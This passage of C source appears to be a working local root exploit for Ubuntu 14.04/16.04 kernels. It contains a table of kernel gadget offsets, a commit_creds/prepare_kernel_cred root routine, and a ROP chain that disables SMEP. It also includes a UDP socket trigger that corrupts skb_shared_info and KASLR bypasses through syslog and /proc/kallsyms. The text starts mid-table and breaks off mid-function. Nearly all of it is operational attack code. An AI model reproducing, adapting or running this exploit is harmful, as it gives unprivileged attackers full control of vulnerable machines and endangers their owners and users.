0x9da80, 0x4520a, 0x30f75, 0x109957, 0x1a7a0, 0x3d6b7a, 0x1cbfc, 0x76453, 0x49d4d, 0x61300, 0x1b91d },\r\n\t{ \"trusty\", \"4.4.0-22-generic\", 0x9d7e0, 0x9dac0, 0x4521a, 0x28c19d, 0x1099b7, 0x1a7f0, 0x3d781a, 0x1cc4c, 0x764b3, 0x49d5d, 0x61300, 0x48040 },\r\n\t{ \"trusty\", \"4.4.0-24-generic\", 0x9d5f0, 0x9d8d0, 0x4516a, 0x1026cd, 0x107757, 0x1a810, 0x3d7a9a, 0x1cc6c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },\r\n\t{ \"trusty\", \"4.4.0-28-generic\", 0x9d760, 0x9da40, 0x4516a, 0x3dc58f, 0x1079a7, 0x1a830, 0x3d801a, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },\r\n\t{ \"trusty\", \"4.4.0-31-generic\", 0x9d760, 0x9da40, 0x4516a, 0x3e223f, 0x1079a7, 0x1a830, 0x3ddcca, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },\r\n\t{ \"trusty\", \"4.4.0-34-generic\", 0x9d760, 0x9da40, 0x4510a, 0x355689, 0x1079a7, 0x1a830, 0x3ddd1a, 0x1cc8c, 0x763b3, 0x49c5d, 0x612f0, 0x47f40 },\r\n\t{ \"trusty\", \"4.4.0-36-generic\", 0x9d770, 0x9da50, 0x4510a, 0x1eec9d, 0x107a47, 0x1a830, 0x3de02a, 0x1cc8c, 0x763c3, 0x29595, 0x61300, 0x47f40 },\r\n\t{ \"trusty\", \"4.4.0-38-generic\", 0x9d820, 0x9db00, 0x4510a, 0x598fd, 0x107af7, 0x1a820, 0x3de8ca, 0x1cc7c, 0x76473, 0x49c5d, 0x61300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-42-generic\", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3deb7a, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-45-generic\", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3debda, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-47-generic\", 0x9d940, 0x9dc20, 0x4511a, 0x171f8d, 0x107bd7, 0x1a820, 0x3e241a, 0x1cc7c, 0x76463, 0x299f5, 0x61300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-51-generic\", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-53-generic\", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-57-generic\", 0x9ebb0, 0x9ee90, 0x4518a, 0x39401d, 0x1097d7, 0x1a820, 0x3e527a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-59-generic\", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dbc4e, 0x1097d7, 0x1a820, 0x3e571a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-62-generic\", 0x9ebe0, 0x9eec0, 0x4518a, 0x3ea46f, 0x109837, 0x1a820, 0x3e5e5a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-63-generic\", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-64-generic\", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-66-generic\", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-67-generic\", 0x9eb60, 0x9ee40, 0x4518a, 0x12a9dc, 0x109887, 0x1a820, 0x3e67ba, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-70-generic\", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-71-generic\", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-72-generic\", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-75-generic\", 0x9eb60, 0x9ee40, 0x4518a, 0x303cfd, 0x1098a7, 0x1a820, 0x3e67ea, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-78-generic\", 0x9eb70, 0x9ee50, 0x4518a, 0x30366d, 0x1098b7, 0x1a820, 0x3e710a, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-79-generic\", 0x9ebb0, 0x9ee90, 0x4518a, 0x3ebdcf, 0x1099a7, 0x1a830, 0x3e77ba, 0x1cc8c, 0x774e3, 0x49cdd, 0x62330, 0x1a78b },\r\n\t{ \"trusty\", \"4.4.0-81-generic\", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dc688, 0x1099a7, 0x1a830, 0x3e789a, 0x1cc8c, 0x774e3, 0x24487, 0x62330, 0x1a78b },\r\n\t{ \"trusty\", \"4.4.0-83-generic\", 0x9ebc0, 0x9eea0, 0x451ca, 0x2dc6f5, 0x1099b7, 0x1a830, 0x3e78fa, 0x1cc8c, 0x77533, 0x49d1d, 0x62360, 0x1a78b },\r\n\t{ \"trusty\", \"4.4.0-87-generic\", 0x9ec20, 0x9ef00, 0x8a, 0x253b93, 0x109a17, 0x1a840, 0x3e7cda, 0x1cc8c, 0x77533, 0x49d1d, 0x62360, 0x1a78b },\r\n\t{ \"trusty\", \"4.4.0-89-generic\", 0x9ec30, 0x9ef10, 0x8a, 0x3ec5cF, 0x109a27, 0x1a830, 0x3e7fba, 0x1cc7c, 0x77523, 0x49d1d, 0x62360, 0x1a77b },\r\n\t{ \"xenial\", \"4.4.0-81-generic\", 0xa2800, 0xa2bf0, 0x8a, 0x3eb4ad, 0x112697, 0x1b9c0, 0x40341a, 0x1de6c, 0x7a453, 0x125787, 0x64580, 0x49ed0 },\r\n\t{ \"xenial\", \"4.4.0-89-generic\", 0xa28a0, 0xa2c90, 0x8a, 0x33e60d, 0x112777, 0x1b9b0, 0x403a1a, 0x1de5c, 0x7a483, 0x1084e5, 0x645b0, 0x3083d },\r\n\t{ \"xenial\", \"4.8.0-34-generic\", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80 },\r\n\t{ \"xenial\", \"4.8.0-36-generic\", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80 },\r\n\t{ \"xenial\", \"4.8.0-39-generic\", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-41-generic\", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },\r\n\t// { \"xenial\", \"4.8.0-42-generic\", 0xa5cf0, 0xa60e0, 0x8d, 0x4149ad, 0x1191f7, 0x1b170, 0x439d7a, 0x185493, 0x7bcf3, 0xdfc5, 0x64210, 0xb2df1b },\r\n\t// { \"xenial\", \"4.8.0-44-generic\", 0xa5cf0, 0xa60e0, 0x8d, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0xdfc5, 0x64210, 0xb2df17 },\r\n\t{ \"xenial\", \"4.8.0-45-generic\", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0xdfc5, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-46-generic\", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-49-generic\", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x439bba, 0x102e33, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-51-generic\", 0xa5d00, 0xa60f0, 0x8d, 0x301f2d, 0x119207, 0x1b170, 0x439bba, 0x102e33, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-52-generic\", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x63e843, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-53-generic\", 0xa5d00, 0xa60f0, 0x8d, 0x301f2d, 0x119207, 0x01b170, 0x43a0da, 0x63e843, 0x07bd03, 0x12c7d7, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-54-generic\", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x5ada3c, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-56-generic\", 0xa5d00, 0xa60f0, 0x17c55, 0x39d50d, 0x119207, 0x1b170, 0x43a14a, 0x44d4a0, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-58-generic\", 0xa5d20, 0xa6110, 0x17c55, 0xe56f5, 0x119227, 0x1b170, 0x439e7a, 0x162622, 0x7bd23, 0x12c7f7, 0x64210, 0x49fa0 },\r\n};\r\n\r\n// Used to get root privileges.\r\n#define COMMIT_CREDS\t\t\t(KERNEL_BASE + kernels[kernel].commit_creds)\r\n#define PREPARE_KERNEL_CRED\t\t(KERNEL_BASE + kernels[kernel].prepare_kernel_cred)\r\n\r\n// Used when ENABLE_SMEP_BYPASS is used.\r\n// - xchg eax, esp ; ret\r\n// - pop rdi ; ret\r\n// - mov dword ptr [rdi], eax ; ret\r\n// - push rbp ; mov rbp, rsp ; mov rax, cr4 ; pop rbp ; ret\r\n// - neg rax ; ret\r\n// - pop rcx ; ret \r\n// - or rax, rcx ; ret\r\n// - xchg eax, edi ; ret\r\n// - push rbp ; mov rbp, rsp ; mov cr4, rdi ; pop rbp ; ret\r\n// - jmp rcx\r\n#define XCHG_EAX_ESP_RET\t\t(KERNEL_BASE + kernels[kernel].xchg_eax_esp_ret)\r\n#define POP_RDI_RET\t\t\t(KERNEL_BASE + kernels[kernel].pop_rdi_ret)\r\n#define MOV_DWORD_PTR_RDI_EAX_RET\t(KERNEL_BASE + kernels[kernel].mov_dword_ptr_rdi_eax_ret)\r\n#define MOV_RAX_CR4_RET\t\t\t(KERNEL_BASE + kernels[kernel].mov_rax_cr4_ret)\r\n#define NEG_RAX_RET\t\t\t(KERNEL_BASE + kernels[kernel].neg_rax_ret)\r\n#define POP_RCX_RET\t\t\t(KERNEL_BASE + kernels[kernel].pop_rcx_ret)\r\n#define OR_RAX_RCX_RET\t\t\t(KERNEL_BASE + kernels[kernel].or_rax_rcx_ret)\r\n#define XCHG_EAX_EDI_RET\t\t(KERNEL_BASE + kernels[kernel].xchg_eax_edi_ret)\r\n#define MOV_CR4_RDI_RET\t\t\t(KERNEL_BASE + kernels[kernel].mov_cr4_rdi_ret)\r\n#define JMP_RCX\t\t\t\t(KERNEL_BASE + kernels[kernel].jmp_rcx)\r\n\r\n// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * *\r\n\r\ntypedef unsigned long __attribute__((regparm(3))) (*_commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (*_prepare_kernel_cred)(unsigned long cred);\r\n\r\nvoid get_root(void) {\r\n\t((_commit_creds)(COMMIT_CREDS))(\r\n\t ((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0));\r\n}\r\n\r\n// * * * * * * * * * * * * * * * * SMEP bypass * * * * * * * * * * * * * * * *\r\n\r\nuint64_t saved_esp;\r\n\r\n// Unfortunately GCC does not support `__atribute__((naked))` on x86, which\r\n// can be used to omit a function's prologue, so I had to use this weird\r\n// wrapper hack as a workaround. Note: Clang does support it, which means it\r\n// has better support of GCC attributes than GCC itself. Funny.\r\nvoid wrapper() {\r\n\tasm volatile (\"\t\t\t\t\t\\n\\\r\n\tpayload:\t\t\t\t\t\\n\\\r\n\t\tmovq %%rbp, %%rax\t\t\t\\n\\\r\n\t\tmovq $0xffffffff00000000, %%rdx\t\t\\n\\\r\n\t\tandq %%rdx, %%rax\t\t\t\\n\\\r\n\t\tmovq %0, %%rdx\t\t\t\t\\n\\\r\n\t\taddq %%rdx, %%rax\t\t\t\\n\\\r\n\t\tmovq %%rax, %%rsp\t\t\t\\n\\\r\n\t\tcall get_root\t\t\t\t\\n\\\r\n\t\tret\t\t\t\t\t\\n\\\r\n\t\" : : \"m\"(saved_esp) : );\r\n}\r\n\r\nvoid payload();\r\n\r\n#define CHAIN_SAVE_ESP\t\t\t\t\\\r\n\t*stack++ = POP_RDI_RET;\t\t\t\\\r\n\t*stack++ = (uint64_t)&saved_esp;\t\\\r\n\t*stack++ = MOV_DWORD_PTR_RDI_EAX_RET;\r\n\r\n#define SMEP_MASK 0x100000\r\n\r\n#define CHAIN_DISABLE_SMEP\t\t\t\\\r\n\t*stack++ = MOV_RAX_CR4_RET;\t\t\\\r\n\t*stack++ = NEG_RAX_RET;\t\t\t\\\r\n\t*stack++ = POP_RCX_RET;\t\t\t\\\r\n\t*stack++ = SMEP_MASK;\t\t\t\\\r\n\t*stack++ = OR_RAX_RCX_RET;\t\t\\\r\n\t*stack++ = NEG_RAX_RET;\t\t\t\\\r\n\t*stack++ = XCHG_EAX_EDI_RET;\t\t\\\r\n\t*stack++ = MOV_CR4_RDI_RET;\r\n\r\n#define CHAIN_JMP_PAYLOAD \\\r\n\t*stack++ = POP_RCX_RET; \\\r\n\t*stack++ = (uint64_t)&payload; \\\r\n\t*stack++ = JMP_RCX;\r\n\r\nvoid mmap_stack() {\r\n\tuint64_t stack_aligned, stack_addr;\r\n\tint page_size, stack_size, stack_offset;\r\n\tuint64_t* stack;\r\n\r\n\tpage_size = getpagesize();\r\n\r\n\tstack_aligned = (XCHG_EAX_ESP_RET & 0x00000000fffffffful) & ~(page_size - 1);\r\n\tstack_addr = stack_aligned - page_size * 4;\r\n\tstack_size = page_size * 8;\r\n\tstack_offset = XCHG_EAX_ESP_RET % page_size;\r\n\r\n\tstack = mmap((void*)stack_addr, stack_size, PROT_READ | PROT_WRITE,\r\n\t\t\tMAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);\r\n\tif (stack == MAP_FAILED || stack != (void*)stack_addr) {\r\n\t\tdprintf(\"[-] mmap()\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tstack = (uint64_t*)((char*)stack_aligned + stack_offset);\r\n\r\n\tCHAIN_SAVE_ESP;\r\n\tCHAIN_DISABLE_SMEP;\r\n\tCHAIN_JMP_PAYLOAD;\r\n}\r\n\r\n// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *\r\n\r\nstruct ubuf_info {\r\n\tuint64_t callback;\t// void (*callback)(struct ubuf_info *, bool)\r\n\tuint64_t ctx;\t\t// void *\r\n\tuint64_t desc;\t\t// unsigned long\r\n};\r\n\r\nstruct skb_shared_info {\r\n\tuint8_t nr_frags;\t// unsigned char\r\n\tuint8_t tx_flags;\t// __u8\r\n\tuint16_t gso_size;\t// unsigned short\r\n\tuint16_t gso_segs;\t// unsigned short\r\n\tuint16_t gso_type;\t// unsigned short\r\n\tuint64_t frag_list;\t// struct sk_buff *\r\n\tuint64_t hwtstamps;\t// struct skb_shared_hwtstamps\r\n\tuint32_t tskey;\t\t// u32\r\n\tuint32_t ip6_frag_id;\t// __be32\r\n\tuint32_t dataref;\t// atomic_t\r\n\tuint64_t destructor_arg; // void *\r\n\tuint8_t frags[16][17];\t// skb_frag_t frags[MAX_SKB_FRAGS];\r\n};\r\n\r\nstruct ubuf_info ui;\r\n\r\nvoid init_skb_buffer(char* buffer, unsigned long func) {\r\n\tstruct skb_shared_info* ssi = (struct skb_shared_info*)buffer;\r\n\tmemset(ssi, 0, sizeof(*ssi));\r\n\r\n\tssi->tx_flags = 0xff;\r\n\tssi->destructor_arg = (uint64_t)&ui;\r\n\tssi->nr_frags = 0;\r\n\tssi->frag_list = 0;\r\n\r\n\tui.callback = func;\r\n}\r\n\r\n// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *\r\n\r\n#define SHINFO_OFFSET 3164\r\n\r\nvoid oob_execute(unsigned long payload) {\r\n\tchar buffer[4096];\r\n\tmemset(&buffer[0], 0x42, 4096);\r\n\tinit_skb_buffer(&buffer[SHINFO_OFFSET], payload);\r\n\r\n\tint s = socket(PF_INET, SOCK_DGRAM, 0);\r\n\tif (s == -1) {\r\n\t\tdprintf(\"[-] socket()\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tstruct sockaddr_in addr;\r\n\tmemset(&addr, 0, sizeof(addr));\r\n\taddr.sin_family = AF_INET;\r\n\taddr.sin_port = htons(8000);\r\n\taddr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\r\n\r\n\tif (connect(s, (void*)&addr, sizeof(addr))) {\r\n\t\tdprintf(\"[-] connect()\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tint size = SHINFO_OFFSET + sizeof(struct skb_shared_info);\r\n\tint rv = send(s, buffer, size, MSG_MORE);\r\n\tif (rv != size) {\r\n\t\tdprintf(\"[-] send()\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tint val = 1;\r\n\trv = setsockopt(s, SOL_SOCKET, SO_NO_CHECK, &val, sizeof(val));\r\n\tif (rv != 0) {\r\n\t\tdprintf(\"[-] setsockopt(SO_NO_CHECK)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tsend(s, buffer, 1, 0);\r\n\r\n\tclose(s);\r\n}\r\n\r\n// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *\r\n\r\n#define CHUNK_SIZE 1024\r\n\r\nint read_file(const char* file, char* buffer, int max_length) {\r\n\tint f = open(file, O_RDONLY);\r\n\tif (f == -1)\r\n\t\treturn -1;\r\n\tint bytes_read = 0;\r\n\twhile (true) {\r\n\t\tint bytes_to_read = CHUNK_SIZE;\r\n\t\tif (bytes_to_read > max_length - bytes_read)\r\n\t\t\tbytes_to_read = max_length - bytes_read;\r\n\t\tint rv = read(f, &buffer[bytes_read], bytes_to_read);\r\n\t\tif (rv == -1)\r\n\t\t\treturn -1;\r\n\t\tbytes_read += rv;\r\n\t\tif (rv == 0)\r\n\t\t\treturn bytes_read;\r\n\t}\r\n}\r\n\r\n#define LSB_RELEASE_LENGTH 1024\r\n\r\nvoid get_distro_codename(char* output, int max_length) {\r\n\tchar buffer[LSB_RELEASE_LENGTH];\r\n\tchar* path = \"/etc/lsb-release\";\r\n\tint length = read_file(path, &buffer[0], LSB_RELEASE_LENGTH);\r\n\tif (length == -1) {\r\n dprintf(\"[-] open/read(%s)\\n\", path);\r\n exit(EXIT_FAILURE);\r\n\t}\r\n\tconst char *needle = \"DISTRIB_CODENAME=\";\r\n\tint needle_length = strlen(needle);\r\n\tchar* found = memmem(&buffer[0], length, needle, needle_length);\r\n\tif (found == NULL) {\r\n\t\tdprintf(\"[-] couldn't find DISTRIB_CODENAME in /etc/lsb-release\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tint i;\r\n\tfor (i = 0; found[needle_length + i] != '\\n'; i++) {\r\n\t\tif (i >= max_length) {\r\n\t\t\texit(EXIT_FAILURE);\r\n\t\t}\r\n\t\tif ((found - &buffer[0]) + needle_length + i >= length) {\r\n\t\t\texit(EXIT_FAILURE);\r\n\t\t}\r\n\t\toutput[i] = found[needle_length + i];\r\n\t}\r\n}\r\n\r\nstruct utsname get_kernel_version() {\r\n\tstruct utsname u;\r\n\tint rv = uname(&u);\r\n\tif (rv != 0) {\r\n\t\tdprintf(\"[-] uname()\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\treturn u;\r\n}\r\n\r\n#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))\r\n\r\n#define DISTRO_CODENAME_LENGTH 32\r\n\r\nvoid detect_kernel() {\r\n\tchar codename[DISTRO_CODENAME_LENGTH];\r\n\tstruct utsname u;\r\n\r\n\tu = get_kernel_version();\r\n\r\n\tif (strstr(u.machine, \"64\") == NULL) {\r\n\t\tdprintf(\"[-] system is not using a 64-bit kernel\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tif (strstr(u.version, \"-Ubuntu\") == NULL) {\r\n\t\tdprintf(\"[-] system is not using an Ubuntu kernel\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tif (strstr(u.version, \"14.04.1\")) {\r\n\t\tstrcpy(&codename[0], \"trusty\");\r\n\t} else if (strstr(u.version, \"16.04.1\")) {\r\n\t\tstrcpy(&codename[0], \"xenial\");\r\n\t} else {\r\n\t\tget_distro_codename(&codename[0], DISTRO_CODENAME_LENGTH);\r\n\r\n\t\t// Linux Mint kernel release mappings\r\n\t\tif (!strcmp(&codename[0], \"qiana\"))\r\n\t\t\tstrcpy(&codename[0], \"trusty\");\r\n\t\tif (!strcmp(&codename[0], \"rebecca\"))\r\n\t\t\tstrcpy(&codename[0], \"trusty\");\r\n\t\tif (!strcmp(&codename[0], \"rafaela\"))\r\n\t\t\tstrcpy(&codename[0], \"trusty\");\r\n\t\tif (!strcmp(&codename[0], \"rosa\"))\r\n\t\t\tstrcpy(&codename[0], \"trusty\");\r\n\t\tif (!strcmp(&codename[0], \"sarah\"))\r\n\t\t\tstrcpy(&codename[0], \"xenial\");\r\n\t\tif (!strcmp(&codename[0], \"serena\"))\r\n\t\t\tstrcpy(&codename[0], \"xenial\");\r\n\t\tif (!strcmp(&codename[0], \"sonya\"))\r\n\t\t\tstrcpy(&codename[0], \"xenial\");\r\n\t}\r\n\r\n\tint i;\r\n\tfor (i = 0; i < ARRAY_SIZE(kernels); i++) {\r\n\t\tif (strcmp(&codename[0], kernels[i].distro) == 0 &&\r\n\t\t strcmp(u.release, kernels[i].version) == 0) {\r\n\t\t\tdprintf(\"[.] kernel version '%s' detected\\n\", kernels[i].version);\r\n\t\t\tkernel = i;\r\n\t\t\treturn;\r\n\t\t}\r\n\t}\r\n\r\n\tdprintf(\"[-] kernel version not recognized\\n\");\r\n\texit(EXIT_FAILURE);\r\n}\r\n\r\n#define PROC_CPUINFO_LENGTH 4096\r\n\r\n// 0 - nothing, 1 - SMEP, 2 - SMAP, 3 - SMEP & SMAP\r\nint smap_smep_enabled() {\r\n\tchar buffer[PROC_CPUINFO_LENGTH];\r\n\tchar* path = \"/proc/cpuinfo\";\r\n\tint length = read_file(path, &buffer[0], PROC_CPUINFO_LENGTH);\r\n\tif (length == -1) {\r\n\t\tdprintf(\"[-] open/read(%s)\\n\", path);\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tint rv = 0;\r\n\tchar* found = memmem(&buffer[0], length, \"smep\", 4);\r\n\tif (found != NULL)\r\n\t\trv += 1;\r\n\tfound = memmem(&buffer[0], length, \"smap\", 4);\r\n\tif (found != NULL)\r\n\t\trv += 2;\r\n\treturn rv;\r\n}\r\n\r\nvoid check_smep_smap() {\r\n\tint rv = smap_smep_enabled();\r\n\tif (rv >= 2) {\r\n\t\tdprintf(\"[-] SMAP detected, no bypass available\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n#if !ENABLE_SMEP_BYPASS\r\n\tif (rv >= 1) {\r\n\t\tdprintf(\"[-] SMEP detected, use ENABLE_SMEP_BYPASS\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n#endif\r\n}\r\n\r\n// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *\r\n\r\n#define SYSLOG_ACTION_READ_ALL 3\r\n#define SYSLOG_ACTION_SIZE_BUFFER 10\r\n\r\nbool mmap_syslog(char** buffer, int* size) {\r\n\t*size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);\r\n\tif (*size == -1) {\r\n\t\tdprintf(\"[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\\n\");\r\n\t\treturn false;\r\n\t}\r\n\r\n\t*size = (*size / getpagesize() + 1) * getpagesize();\r\n\t*buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE,\r\n\t\t\t\t MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\r\n\r\n\t*size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);\r\n\tif (*size == -1) {\r\n\t\tdprintf(\"[-] klogctl(SYSLOG_ACTION_READ_ALL)\\n\");\r\n\t\treturn false;\r\n\t}\r\n\r\n\treturn true;\r\n}\r\n\r\nunsigned long get_kernel_addr_trusty(char* buffer, int size) {\r\n\tconst char* needle1 = \"Freeing unused\";\r\n\tchar* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));\r\n\tif (substr == NULL) return 0;\r\n\r\n\tint start = 0;\r\n\tint end = 0;\r\n\tfor (end = start; substr[end] != '-'; end++);\r\n\r\n\tconst char* needle2 = \"ffffff\";\r\n\tsubstr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));\r\n\tif (substr == NULL) return 0;\r\n\r\n\tchar* endptr = &substr[16];\r\n\tunsigned long r = strtoul(&substr[0], &endptr, 16);\r\n\r\n\tr &= 0xffffffffff000000ul;\r\n\r\n\treturn r;\r\n}\r\n\r\nunsigned long get_kernel_addr_xenial(char* buffer, int size) {\r\n\tconst char* needle1 = \"Freeing unused\";\r\n\tchar* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));\r\n\tif (substr == NULL) {\r\n\t\treturn 0;\r\n\t}\r\n\r\n\tint start = 0;\r\n\tint end = 0;\r\n\tfor (start = 0; substr[start] != '-'; start++);\r\n\tfor (end = start; substr[end] != '\\n'; end++);\r\n\r\n\tconst char* needle2 = \"ffffff\";\r\n\tsubstr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));\r\n\tif (substr == NULL) {\r\n\t\treturn 0;\r\n\t}\r\n\r\n\tchar* endptr = &substr[16];\r\n\tunsigned long r = strtoul(&substr[0], &endptr, 16);\r\n\r\n\tr &= 0xfffffffffff00000ul;\r\n\tr -= 0x1000000ul;\r\n\r\n\treturn r;\r\n}\r\n\r\nunsigned long get_kernel_addr_syslog() {\r\n\tunsigned long addr = 0;\r\n\tchar* syslog;\r\n\tint size;\r\n\r\n\tdprintf(\"[.] trying syslog...\\n\");\r\n\r\n\tif (!mmap_syslog(&syslog, &size))\r\n\t\treturn 0;\r\n\r\n\tif (strcmp(\"trusty\", kernels[kernel].distro) == 0)\r\n\t\taddr = get_kernel_addr_trusty(syslog, size);\r\n\tif (strcmp(\"xenial\", kernels[kernel].distro) == 0)\r\n\t\taddr = get_kernel_addr_xenial(syslog, size);\r\n\r\n\tif (!addr)\r\n\t\tdprintf(\"[-] kernel base not found in syslog\\n\");\r\n\r\n\treturn addr;\r\n}\r\n\r\n// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *\r\n\r\nunsigned long get_kernel_addr_kallsyms() {\r\n\tFILE *f;\r\n\tunsigned long addr = 0;\r\n\tchar dummy;\r\n\tchar sname[256];\r\n\tchar* name = \"startup_64\";\r\n\tchar* path = \"/proc/kallsyms\";\r\n\r\n\tdprintf(\"[.] trying %s...\\n\", path);\r\n\tf = fopen(path, \"r\");\r\n\tif (f == NULL) {\r\n\t\tdprintf(\"[-] open/read(%s)\\n\", path);\r\n\t\treturn 0;\r\n\t}\r\n\r\n\tint ret = 0;\r\n\twhile (ret != EOF) {\r\n\t\tret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\r\n\t\tif (ret == 0) {\r\n\t\t\tfscanf(f, \"%s\\n\", 